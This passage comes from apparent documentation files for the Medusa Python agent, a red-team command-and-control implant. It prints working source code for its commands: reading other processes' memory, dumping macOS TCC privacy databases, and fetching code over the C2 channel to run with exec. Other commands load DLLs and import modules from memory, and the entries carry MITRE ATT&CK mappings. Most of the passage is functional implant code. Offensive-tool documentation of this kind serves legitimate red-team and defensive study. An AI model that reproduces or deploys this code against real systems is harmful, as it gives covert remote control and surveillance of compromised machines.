WINAPI Definitions\n        PROCESS_VM_READ           = 0x0010\n        PROCESS_QUERY_INFORMATION = 0x0400\n\n        ERROR_INVALID_HANDLE = 0x0006\n        ERROR_PARTIAL_COPY   = 0x012B\n\n        WIN32_PROCESS_TIMES_TICKS_PER_SECOND = 1e7\n\n        MAX_PATH = 260\n        PROCESS_TERMINATE = 0x0001\n        PROCESS_QUERY_INFORMATION = 0x0400\n\n        ProcessBasicInformation   = 0\n        ProcessDebugPort          = 7\n        ProcessWow64Information   = 26\n        ProcessImageFileName      = 27\n        ProcessBreakOnTermination = 29\n\n        STATUS_UNSUCCESSFUL         = NTSTATUS(0xC0000001)\n        STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value\n        STATUS_INVALID_HANDLE       = NTSTATUS(0xC0000008).value\n        STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value\n\n\n        class RemotePointer(ctypes._Pointer):\n            def __getitem__(self, key):\n                # TODO: slicing\n                size = None\n                if not isinstance(key, tuple):\n                    raise KeyError('must be (index, handle[, size])')\n                if len(key) > 2:\n                    index, handle, size = key\n                else:\n                    index, handle = key\n                if isinstance(index, slice):\n                    raise TypeError('slicing is not supported')\n                dtype = self._type_\n                offset = ctypes.sizeof(dtype) * index\n                address = PVOID.from_buffer(self).value + offset\n                simple = issubclass(dtype, ctypes._SimpleCData)\n                if simple and size is not None:\n                    if dtype._type_ == ctypes.wintypes.WCHAR._type_:\n                        buf = (ctypes.wintypes.WCHAR * (size // 2))()\n                    else:\n                        buf = (ctypes.c_char * size)()\n                else:\n                    buf = dtype()\n                nread = SIZE_T()\n                Kernel32.ReadProcessMemory(handle,\n                                        address,\n                                        ctypes.byref(buf),\n                                        ctypes.sizeof(buf),\n                                        ctypes.byref(nread))\n                if simple:\n                    return buf.value\n                return buf\n\n        _remote_pointer_cache = {}\n        def RPOINTER(dtype):\n            if dtype in _remote_pointer_cache:\n                return _remote_pointer_cache[dtype]\n            name = 'RP_%s' % dtype.__name__\n            ptype = type(name, (RemotePointer,), {'_type_': dtype})\n            _remote_pointer_cache[dtype] = ptype\n            return ptype\n\n\n        RPWSTR = RPOINTER(ctypes.wintypes.WCHAR)\n\n        class UNICODE_STRING(ctypes.Structure):\n            _fields_ = (('Length',        ctypes.wintypes.USHORT),\n                        ('MaximumLength', ctypes.wintypes.USHORT),\n                        ('Buffer',        RPWSTR))\n\n        class LIST_ENTRY(ctypes.Structure):\n            pass\n\n        RPLIST_ENTRY = RPOINTER(LIST_ENTRY)\n\n        LIST_ENTRY._fields_ = (('Flink', RPLIST_ENTRY),\n                            ('Blink', RPLIST_ENTRY))\n\n        class LDR_DATA_TABLE_ENTRY(ctypes.Structure):\n            _fields_ = (('Reserved1',          PVOID * 2),\n                        ('InMemoryOrderLinks', LIST_ENTRY),\n                        ('Reserved2',          PVOID * 2),\n                        ('DllBase',            PVOID),\n                        ('EntryPoint',         PVOID),\n                        ('Reserved3',          PVOID),\n                        ('FullDllName',        UNICODE_STRING),\n                        ('Reserved4',          ctypes.wintypes.BYTE * 8),\n                        ('Reserved5',          PVOID * 3),\n                        ('CheckSum',           PVOID),\n                        ('TimeDateStamp',      ctypes.wintypes.ULONG))\n\n        RPLDR_DATA_TABLE_ENTRY = RPOINTER(LDR_DATA_TABLE_ENTRY)\n\n        class PEB_LDR_DATA(ctypes.Structure):\n            _fields_ = (('Reserved1',               ctypes.wintypes.BYTE * 8),\n                        ('Reserved2',               PVOID * 3),\n                        ('InMemoryOrderModuleList', LIST_ENTRY))\n\n        RPPEB_LDR_DATA = RPOINTER(PEB_LDR_DATA)\n\n        class RTL_USER_PROCESS_PARAMETERS(ctypes.Structure):\n            _fields_ = (('Reserved1',     ctypes.wintypes.BYTE * 16),\n                        ('Reserved2',     PVOID * 10),\n                        ('ImagePathName', UNICODE_STRING),\n                        ('CommandLine',   UNICODE_STRING))\n\n        RPRTL_USER_PROCESS_PARAMETERS = RPOINTER(RTL_USER_PROCESS_PARAMETERS)\n        PPS_POST_PROCESS_INIT_ROUTINE = PVOID\n\n        class PEB(ctypes.Structure):\n            _fields_ = (('Reserved1',              ctypes.wintypes.BYTE * 2),\n                        ('BeingDebugged',          ctypes.wintypes.BYTE),\n                        ('Reserved2',              ctypes.wintypes.BYTE * 1),\n                        ('Reserved3',              PVOID * 2),\n                        ('Ldr',                    RPPEB_LDR_DATA),\n                        ('ProcessParameters',      RPRTL_USER_PROCESS_PARAMETERS),\n                        ('Reserved4',              ctypes.wintypes.BYTE * 104),\n                        ('Reserved5',              PVOID * 52),\n                        ('PostProcessInitRoutine', PPS_POST_PROCESS_INIT_ROUTINE),\n                        ('Reserved6',              ctypes.wintypes.BYTE * 128),\n                        ('Reserved7',              PVOID * 1),\n                        ('SessionId',              ctypes.wintypes.ULONG))\n\n        RPPEB = RPOINTER(PEB)\n\n        class PROCESS_BASIC_INFORMATION(ctypes.Structure):\n            _fields_ = (('Reserved1',       PVOID),\n                        ('PebBaseAddress',  RPPEB),\n                        ('Reserved2',       PVOID * 2),\n                        ('UniqueProcessId', ULONG_PTR),\n                        ('InheritedFromUniqueProcessId',       ULONG_PTR))\n\n        def NtError(status):\n            import sys\n            descr = 'NTSTATUS(%#08x) ' % (status % 2**32,)\n            if status & 0xC0000000 == 0xC0000000:\n                descr += '[Error]'\n            elif status & 0x80000000 == 0x80000000:\n                descr += '[Warning]'\n            elif status & 0x40000000 == 0x40000000:\n                descr += '[Information]'\n            else:\n                descr += '[Success]'\n            if sys.version_info[:2] < (3, 3):\n                return WindowsError(status, descr)\n            return OSError(None, descr, None, status)\n\n        ntdll = ctypes.WinDLL('ntdll.dll')\n        NtQueryInformationProcess = ntdll.NtQueryInformationProcess\n        NtQueryInformationProcess.restype = NTSTATUS\n        NtQueryInformationProcess.argtypes = (\n            ctypes.wintypes.HANDLE,\n            PROCESSINFOCLASS, \n            PVOID,            \n            ctypes.wintypes.ULONG, \n            PULONG)           \n\n        class ProcessInformation(object):\n            _close_handle = False\n            _closed = False\n            _module_names = None\n\n            def __init__(self, process_id=None, handle=None):\n                if process_id is None and handle is None:\n                    handle = GetCurrentProcess()\n                elif handle is None:\n                    handle = OpenProcess(PROCESS_VM_READ | \n                                            PROCESS_QUERY_INFORMATION,\n                                                False, process_id)\n                    self._close_handle = True\n                self._handle = handle\n                self._query_info()\n                if process_id is not None and not self._ldr:\n                    return\n\n            def __del__(self, CloseHandle=CloseHandle):\n                if self._close_handle and not self._closed:\n                    try:\n                        CloseHandle(self._handle)\n                    except WindowsError as e:\n                        pass\n                    self._closed = True\n\n            def _query_info(self):\n                info = PROCESS_BASIC_INFORMATION()\n                handle = self._handle\n                status = NtQueryInformationProcess(handle,\n                                                ProcessBasicInformation,\n                                                ctypes.byref(info),\n                                                ctypes.sizeof(info),\n                                                None)\n                if status < 0:\n                    raise NtError(status)\n\n                self._peb = peb = info.PebBaseAddress[0, handle]\n                self._ldr = peb.Ldr[0, handle]\n\n            def _modules_iter(self):\n                headaddr = (PVOID.from_buffer(self._peb.Ldr).value +\n                            PEB_LDR_DATA.InMemoryOrderModuleList.offset)\n                offset = LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.offset\n                pentry = self._ldr.InMemoryOrderModuleList.Flink\n                while pentry:\n                    pentry_void = PVOID.from_buffer_copy(pentry)\n                    if pentry_void.value == headaddr:\n                        break\n                    pentry_void.value -= offset\n                    pmod = RPLDR_DATA_TABLE_ENTRY.from_buffer(pentry_void)\n                    mod = pmod[0, self._handle]\n                    yield mod\n                    pentry = LIST_ENTRY.from_buffer(mod, offset).Flink\n\n            def update_module_names(self):\n                names = []\n                for m in self._modules_iter():\n                    ustr = m.FullDllName\n                    name = ustr.Buffer[0, self._handle, ustr.Length]\n                    names.append(name)\n                self._module_names = names\n\n            @property\n            def module_names(self):\n                if self._module_names is None:\n                    self.update_module_names()\n                return self._module_names\n\n        try:\n            if not process_id:\n                pi = ProcessInformation()\n            else:\n                pi = ProcessInformation(process_id)\n            return { \"dlls\": pi.module_names }\n        except Exception as e:\n            return e\n```\n\nThis output is turned into a sortable table via a browserscript."
  },
  {
    "path": "documentation-payload/medusa/commands/list_modules.md",
    "content": "+++\ntitle = \"list_modules\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nLists the modules (Python libraries) that have been loaded into the Medusa agent.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n### Arguments\n\n#### module_name\n\n- Description: specific module to output a full file listing for\n- Required Value: False  \n- Default Value: \"\"  \n\n\n## Usage\n\n```\nlist_modules [module_name]\n```\n\n## Detailed Summary\n\nThis function will list the name of the modules that have been loaded into memory, and can provide a detailed file listing if a module name is passed to it:\n\n```Python\n    def list_modules(self, task_id, module_name=\"\"):\n        if module_name:\n            if module_name in self.moduleRepo.keys():\n                return \"\\n\".join(self.moduleRepo[module_name].namelist())\n            else: return \"{} not found in loaded modules\".format(module_name)\n        else:\n            return \"\\n\".join(self.moduleRepo.keys())\n\n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/list_tcc.md",
    "content": "+++\ntitle = \"list_tcc\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis uses the Python `sqlite` library to query TCC databases and return the contents.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n## Usage\n\n```\nlist_tcc\n```\n\n## Detailed Summary\nWith the relevant access, Medusa uses the `sqlite` library to query the contents of either the Root or user-specific TCC databases. This is then formatted by a browser script in the UI.\n\n```Python\n    def list_tcc(self,task_id,tcc=True, db=\"/Library/Application Support/com.apple.TCC/TCC.db\"):\n        import sqlite3\n\n        with sqlite3.connect(db) as con:\n            columns = []\n            for row in con.execute('PRAGMA table_info(\"access\")'):\n                columns.append(row)\n\n            tcc = []\n            for row in con.execute('SELECT * FROM \"access\"'):\n                tcc.append(row)\n            results = []\n            for entry in tcc:\n                line={}\n                count = 0 \n                for ent in entry:\n                    if columns[count][2] == \"BLOB\" and ent != None:\n                        line[columns[count][1]] = base64.b64encode(ent).decode()\n                    else: line[columns[count][1]] = str(ent)\n                    count+=1\n                results.append(line)\n\n            tcc_results = {}\n            tcc_results[\"entries\"] = results\n            return { \"tcc\": results }\n\n```"
  },
  {
    "path": "documentation-payload/medusa/commands/load.md",
    "content": "+++\ntitle = \"load\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis loads new functions into memory via the C2 channel \n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### cmd_to_load\n\n- Description: name of existing Medusa command to load (e.g. shell)\n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\nload cmd\n```\n\n## MITRE ATT&CK Mapping\n\n- T1030  \n- T1129 \n\n## Detailed Summary\nThe associated command's python files (selecting the correct Python version where necessary) is base64 encoded, and sent down to the agent to be loaded in. \n\n```Python\n    def load(self, task_id, file_id, command):\n        total_chunks = 1\n        chunk_num = 0\n        cmd_code = \"\"\n        while (chunk_num < total_chunks):\n            if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                return \"Job stopped.\"\n            data = { \"action\": \"post_response\", \"responses\": [\n                    { \"upload\": { \"chunk_size\": CHUNK_SIZE, \"file_id\": file_id, \"chunk_num\": chunk_num }, \"task_id\": task_id }\n                ]}\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            chunk_num+=1\n            total_chunks = chunk[\"total_chunks\"]\n            cmd_code += base64.b64decode(chunk[\"chunk_data\"]).decode()\n\n        if cmd_code:\n            exec(cmd_code.replace(\"\\n    \",\"\\n\")[4:])\n            setattr(medusa, command, eval(command))\n            cmd_list = [{\"action\": \"add\", \"cmd\": command}]\n            responses = [{ \"task_id\": task_id, \"user_output\": \"Loaded command: {}\".format(command), \"commands\": cmd_list, \"completed\": True }]\n            message = { \"action\": \"post_response\", \"responses\": responses }\n            response_data = self.postMessageAndRetrieveResponse(message)\n        else: return \"Failed to upload '{}' command\".format(command)\n```\n\nNotably, this implementation implements chunking for this function to facilitate large functions being loaded."
  },
  {
    "path": "documentation-payload/medusa/commands/load_dll.md",
    "content": "+++\ntitle = \"load_dll\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nUses Python's `ctypes` library to load a DLL on disk and execute it with a given export function.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n### Arguments\n\n#### path\n\n- Description: path to DLL on target file system\n- Required Value: True  \n- Default Value: None  \n\n#### export\n\n- Description: exported function to execute\n- Required Value: True  \n- Default Value: None  \n\n\n## Usage\n\n```\nload_dll path/to/dll function_exported\n```\n\n## Detailed Summary\n\nUses the `ctypes` library to execute a DLL with its supported function. This expects a DLL that returns an int value and doesn't exit the process upon completion (because that'll kill the agent too!):\n\n```Python\n    def load_dll(self, task_id, dllpath, dllexport):\n        from ctypes import WinDLL\n        dll_file_path = dllpath if dllpath[0] == os.sep \\\n                else os.path.join(self.current_directory,dllpath)\n        loaded_dll = WinDLL(dll_file_path)\n        eval(\"{}.{}()\".format(\"loaded_dll\",dllexport))\n        return \"[*] {} Loaded.\".format(dllpath)\n\n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/load_module.md",
    "content": "+++\ntitle = \"load_module\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nLoads a zipped Python module into memory for reference in custom scripts.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n### Arguments\n\n#### file\n\n- Description: a local zip file containing the directory for a python module\n- Required Value: True  \n- Default Value: None  \n\n#### module_name\n\n- Description: the name of the module being loaded, e.g. 'dns'\n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\nload_module\n```\n\n## Detailed Summary\n\nThis function instantiates a new custom finder and adds it to `meta_path`. When an import is used in subsequent scripts, the `meta_path` will use this custom finder to load the module directly from memory, rather than from on-disk standard locations:\n\nPython 2.7\n```Python\n    def load_module(self, task_id, file, module_name):\n        import zipfile, io\n        class CFinder(object):\n            def __init__(self, repoName, instance):\n                self.moduleRepo = instance.moduleRepo\n                self.repoName = repoName\n                self._source_cache = {}\n\n            def _get_info(self, repoName, fullname):\n                parts = fullname.split('.')\n                submodule = parts[-1]\n                modulepath = '/'.join(parts)\n                _search_order = [('.py', False), ('/__init__.py', True)]\n                for suffix, is_package in _search_order:\n                    relpath = modulepath + suffix\n                    try: self.moduleRepo[repoName].getinfo(relpath)\n                    except KeyError: pass\n                    else: return submodule, is_package, relpath\n                msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))\n                raise ImportError(msg)\n\n            def _get_source(self, repoName, fullname):\n                submodule, is_package, relpath = self._get_info(repoName, fullname)\n                fullpath = '%s/%s' % (repoName, relpath)\n                if relpath in self._source_cache:\n                    source = self._source_cache[relpath]\n                    return submodule, is_package, fullpath, source\n                try:\n                    source =  self.moduleRepo[repoName].read(relpath)\n                    source = source.replace(b'\\r\\n', b'\\n')\n                    source = source.replace(b'\\r', b'\\n')\n                    self._source_cache[relpath] = source\n                    return submodule, is_package, fullpath, source\n                except: raise ImportError(\"Unable to obtain source for module %s\" % (fullpath))\n\n            def find_module(self, fullname, path=None):\n                try: submodule, is_package, relpath = self._get_info(self.repoName, fullname)\n                except ImportError: return None\n                else: return self\n\n            def load_module(self, fullname):\n                import imp\n                submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)\n                code = compile(source, fullpath, 'exec')\n                mod = sys.modules.setdefault(fullname, imp.new_module(fullname))\n                mod.__loader__ = self\n                mod.__file__ = fullpath\n                mod.__name__ = fullname\n                if is_package: mod.__path__ = [os.path.dirname(mod.__file__)]\n                exec code in mod.__dict__\n                return mod\n\n            def get_data(self, fullpath):\n                prefix = os.path.join(self.repoName, '')\n                if not fullpath.startswith(prefix):\n                    raise IOError('Path %r does not start with module name %r', (fullpath, prefix))\n                relpath = fullpath[len(prefix):]\n                try: return self.moduleRepo[self.repoName].read(relpath)\n                except KeyError: raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))\n\n            def is_package(self, fullname):\n                \"\"\"Return if the module is a package\"\"\"\n                submodule, is_package, relpath = self._get_info(self.repoName, fullname)\n                return is_package\n\n            def get_code(self, fullname):\n                submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)\n                return compile(source, fullpath, 'exec')\n\n        if module_name in self.moduleRepo.keys(): return \"{} module already loaded.\".format(module_name)\n        total_chunks = 1\n        chunk_num = 0\n        module_zip = bytearray()\n        while (chunk_num < total_chunks):\n            if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                return \"Job stopped.\"\n            data = { \"action\": \"post_response\", \"responses\": [\n                    { \"upload\": { \"chunk_size\": CHUNK_SIZE, \"file_id\": file, \"chunk_num\": chunk_num+1 }, \"task_id\": task_id }\n                ]}\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            total_chunks = chunk[\"total_chunks\"]\n            chunk_num+=1\n            module_zip.extend(base64.b64decode(chunk[\"chunk_data\"]))\n\n        if module_zip:\n            self.moduleRepo[module_name] = zipfile.ZipFile(io.BytesIO(module_zip))\n            if module_name not in self._meta_cache:\n                finder = CFinder(module_name, self)\n                self._meta_cache[module_name] = finder\n                sys.meta_path.append(finder)        \n        else: return \"Failed to download in-memory module\"\n\n```\n\nPython 3.8:\n```Python\n    def load_module(self, task_id, file, module_name):\n        import zipfile, io\n\n        class CFinder(object):\n            def __init__(self, repoName, instance):\n                self.moduleRepo = instance.moduleRepo\n                self.repoName = repoName\n                self._source_cache = {}\n\n            def _get_info(self, repoName, fullname):\n                parts = fullname.split('.')\n                submodule = parts[-1]\n                modulepath = '/'.join(parts)\n                _search_order = [('.py', False), ('/__init__.py', True)]\n                for suffix, is_package in _search_order:\n                    relpath = modulepath + suffix\n                    try: self.moduleRepo[repoName].getinfo(relpath)\n                    except KeyError: pass\n                    else: return submodule, is_package, relpath\n                msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))\n                raise ImportError(msg)\n\n            def _get_source(self, repoName, fullname):\n                submodule, is_package, relpath = self._get_info(repoName, fullname)\n                fullpath = '%s/%s' % (repoName, relpath)\n                if relpath in self._source_cache:\n                    source = self._source_cache[relpath]\n                    return submodule, is_package, fullpath, source\n                try:\n                    source =  self.moduleRepo[repoName].read(relpath)\n                    source = source.replace(b'\\r\\n', b'\\n')\n                    source = source.replace(b'\\r', b'\\n')\n                    self._source_cache[relpath] = source\n                    return submodule, is_package, fullpath, source\n                except: raise ImportError(\"Unable to obtain source for module %s\" % (fullpath))\n\n            def find_module(self, fullname, path=None):\n                try: submodule, is_package, relpath = self._get_info(self.repoName, fullname)\n                except ImportError: return None\n                else: return self\n\n            def load_module(self, fullname):\n                import types\n                submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)\n                code = compile(source, fullpath, 'exec')\n                mod = sys.modules.setdefault(fullname, types.ModuleType(fullname))\n                mod.__loader__ = self\n                mod.__file__ = fullpath\n                mod.__name__ = fullname\n                if is_package:\n                    mod.__path__ = [os.path.dirname(mod.__file__)]\n                exec(code, mod.__dict__)\n                return mod\n\n            def get_data(self, fullpath):\n\n                prefix = os.path.join(self.repoName, '')\n                if not fullpath.startswith(prefix):\n                    raise IOError('Path %r does not start with module name %r', (fullpath, prefix))\n                relpath = fullpath[len(prefix):]\n                try:\n                    return self.moduleRepo[self.repoName].read(relpath)\n                except KeyError:\n                    raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))\n\n            def is_package(self, fullname):\n                \"\"\"Return if the module is a package\"\"\"\n                submodule, is_package, relpath = self._get_info(self.repoName, fullname)\n                return is_package\n\n            def get_code(self, fullname):\n                submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)\n                return compile(source, fullpath, 'exec')\n\n        if module_name in self.moduleRepo.keys():\n            return \"{} module already loaded.\".format(module_name)\n        total_chunks = 1\n        chunk_num = 0\n        module_zip = bytearray()\n        while (chunk_num < total_chunks):\n            if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                return \"Job stopped.\"\n            data = { \"action\": \"post_response\", \"responses\": [\n                    { \"upload\": { \"chunk_size\": CHUNK_SIZE, \"file_id\": file, \"chunk_num\": chunk_num+1 }, \"task_id\": task_id }\n                ]}\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            total_chunks = chunk[\"total_chunks\"]\n            chunk_num+=1\n            module_zip.extend(base64.b64decode(chunk[\"chunk_data\"]))\n\n        if module_zip:\n            self.moduleRepo[module_name] = zipfile.ZipFile(io.BytesIO(module_zip))\n            if module_name not in self._meta_cache:\n                finder = CFinder(module_name, self)\n                self._meta_cache[module_name] = finder\n                sys.meta_path.append(finder)        \n        else: return \"Failed to download in-memory module\"\n\n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/load_script.md",
    "content": "+++\ntitle = \"load_script\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis loads a new script into memory via the C2 channel. It can be used in combination with the `eval_code` function, and `setattr()` to dynamically add capability outside of Medusa's existing functions.  \n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### file\n\n- Description: script file to load into agent\n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\nload_script\n```\n\n## Detailed Summary\n\nThe python script is downloaded and executed using the Python `exec()` function. Notably, this implementation implements chunking for this function to facilitate large scripts being loaded.\n\nDepending on the script content being interpreted, you can include functions that may be called later, using the `setattr()` function and Medusa's `eval_code` function.\n\nFirstly, the function itself:\n\n```Python\n    def load_script(self, task_id, file):\n        total_chunks = 1\n        chunk_num = 0\n        cmd_code = \"\"\n        while (chunk_num < total_chunks):\n            if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                return \"Job stopped.\"\n            data = { \"action\": \"post_response\", \"responses\": [\n                    { \"upload\": { \"chunk_size\": CHUNK_SIZE, \"file_id\": file, \"chunk_num\": chunk_num }, \"task_id\": task_id }\n                ]}\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            chunk_num+=1\n            total_chunks = chunk[\"total_chunks\"]\n            cmd_code += base64.b64decode(chunk[\"chunk_data\"]).decode()\n            \n        if cmd_code: exec(cmd_code)\n        else: return \"Failed to load script\"\n\n```\n\nIf we pass a script like the one below to Medusa, it'll print `hello` immediately. Then, as we've registered our `hello_again` function, we can call it again with the Medusa command: `eval_code self.hello_again()`. This will then execute the second print statement, to display `hello again`. A very simple example, but hopefully one that articulates what's possible here.\n\n```\nprint(\"hello\")\n\ndef hello_again(self):\n    print(\"hello again\")\n\nsetattr(medusa, \"hello_again\", hello_again)\n```\n\n{{% notice warning %}}\n Script content must be compatible with the version of Python the agent is running with!\n{{% /notice %}}\n "
  },
  {
    "path": "documentation-payload/medusa/commands/ls.md",
    "content": "+++\ntitle = \"ls\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nGet attributes about a file and display it to the user via API calls. No need for quotes and relative paths are fine \n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### path\n\n- Description: Path of file or folder on the current system to list   \n- Required Value: True  \n- Default Value: .  \n\n## Usage\n\n```\nls /path/to/file\n```\n\n## MITRE ATT&CK Mapping\n\n- T1106  \n- T1083  \n\n## Detailed Summary\nThis command used python `os` library functions to get the contents of directories and metadata of files. \n\nPython 2.7:\n```Python\n    def ls(self, task_id, path, file_browser=False):\n        if path == \".\": file_path = self.current_directory\n        else: file_path = path if path[0] == os.sep \\\n                else os.path.join(self.current_directory,path)\n        file_details = os.stat(file_path)\n        target_is_file = os.path.isfile(file_path)\n        target_name = os.path.basename(file_path.rstrip(os.sep))\n        file_browser = {\n            \"host\": socket.gethostname(),\n            \"is_file\": target_is_file,\n            \"permissions\": {\"octal\": oct(file_details.st_mode)[-3:]},\n            \"name\": target_name if target_name != \".\" \\\n                    else os.path.basename(self.current_directory.rstrip(os.sep)),            \"parent_path\": os.path.abspath(os.path.join(file_path, os.pardir)),\n            \"success\": True,\n            \"access_time\": time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_atime)),\n            \"modify_time\": time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_mtime)),\n            \"size\": file_details.st_size,\n            \"update_deleted\": True,\n        }\n        files = []\n        if not target_is_file:\n            for entry in os.listdir(file_path):\n                full_path = os.path.join(file_path, entry)\n                file = {}\n                file['name'] = entry \n                file['is_file'] = True if os.path.isfile(full_path) else False\n                try:\n                    file_details = os.stat(full_path)\n                    file[\"permissions\"] = { \"octal\": oct(file_details.st_mode)[-3:]}\n                    file[\"access_time\"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_atime))\n                    file[\"modify_time\"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_mtime))\n                    file[\"size\"] = file_details.st_size\n                except OSError as e:\n                    pass\n                files.append(file)\n        file_browser[\"files\"] = files\n        task = [task for task in self.taskings if task[\"task_id\"] == task_id]\n        task[0][\"file_browser\"] = file_browser\n        return { \"files\": files }\n```\n\nPython 3.8\n\n```Python\n    def ls(self, task_id, path, file_browser=False):\n        if path == \".\": file_path = self.current_directory\n        else: file_path = path if path[0] == os.sep \\\n                else os.path.join(self.current_directory,path)\n        file_details = os.stat(file_path)\n        target_is_file = os.path.isfile(file_path)\n        target_name = os.path.basename(file_path.rstrip(os.sep))\n        file_browser = {\n            \"host\": socket.gethostname(),\n            \"is_file\": target_is_file,\n            \"permissions\": {\"octal\": oct(file_details.st_mode)[-3:]},\n            \"name\": target_name if target_name != \".\" \\\n                    else os.path.basename(self.current_directory.rstrip(os.sep)),            \"parent_path\": os.path.abspath(os.path.join(file_path, os.pardir)),\n            \"success\": True,\n            \"access_time\": time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_atime)),\n            \"modify_time\": time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_mtime)),\n            \"size\": file_details.st_size,\n            \"update_deleted\": True,\n        }\n        files = []\n        if not target_is_file:\n            with os.scandir(file_path) as entries:\n                for entry in entries:\n                    file = {}\n                    file['name'] = entry.name\n                    file['is_file'] = True if entry.is_file() else False\n                    try:\n                        file_details = os.stat(os.path.join(file_path, entry.name))\n                        file[\"permissions\"] = { \"octal\": oct(file_details.st_mode)[-3:]}\n                        file[\"access_time\"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_atime))\n                        file[\"modify_time\"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_mtime))\n                        file[\"size\"] = file_details.st_size\n                    except OSError as e:\n                        pass\n                    files.append(file)  \n        file_browser[\"files\"] = files\n        task = [task for task in self.taskings if task[\"task_id\"] == task_id]\n        task[0][\"file_browser\"] = file_browser\n        return { \"files\": files }\n\n```\n\nThis command helps populate the file browser, which is where all this data can be seen.\n"
  },
  {
    "path": "documentation-payload/medusa/commands/mv.md",
    "content": "+++\ntitle = \"mv\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nMove a given file or folder to a specified location. No quotes are necessary and relative paths are fine \n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n### Arguments\n\n#### source_path\n\n- Description: path of file/folder to move\n- Required Value: True  \n- Default Value: None  \n\n#### dest_path\n\n- Description: path to move file/folder to  \n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n### Without Popup Option\n```\nmv path/of/file_or_folder /dest/to/move/to \n```\n\n## Detailed Summary\nYou can either type `mv` and get a popup to fill in the paths, or provide the paths on the command line. \n\n```Python\n    def mv(self, task_id, source, destination):\n        import shutil\n        source_path = source if source[0] == os.sep \\\n                else os.path.join(self.current_directory,source)\n        dest_path = destination if destination[0] == os.sep \\\n                else os.path.join(self.current_directory,destination)\n        shutil.move(source_path, dest_path)\n\n```\n"
  },
  {
    "path": "documentation-payload/medusa/commands/pip_freeze.md",
    "content": "+++\ntitle = \"pip_freeze\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nPrints the currently installed python packages on the target system\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n## Usage\n\n```\npip_freeze\n```\n\n## Detailed Summary\n\nAttempts to list packages (ideally with version information) using a series of methods, based on availability:\n\n```Python\n    def pip_freeze(self, task_id):\n        out=\"\"\n        try:\n            import pkg_resources\n            installed_packages = pkg_resources.working_set\n            installed_packages_list = sorted([\"%s==%s\" % (i.key, i.version) for i in installed_packages])\n            return \"\\n\".join(installed_packages_list)\n        except:\n            out+=\"[*] pkg_resources module not installed.\\n\"\n\n        try:\n            from pip._internal.operations.freeze import freeze\n            installed_packages_list = freeze(local_only=True)\n            return \"\\n\".join(installed_packages_list)\n        except:\n            out+=\"[*] pip module not installed.\\n\"\n\n        try:\n            import pkgutil\n            installed_packages_list = [ a for _, a, _ in pkgutil.iter_modules()]\n            return \"\\n\".join(installed_packages_list)\n        except:\n            out+=\"[*] pkgutil module not installed.\\n\"\n\n        return out+\"[!] No modules available to list installed packages.\" \n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/ps.md",
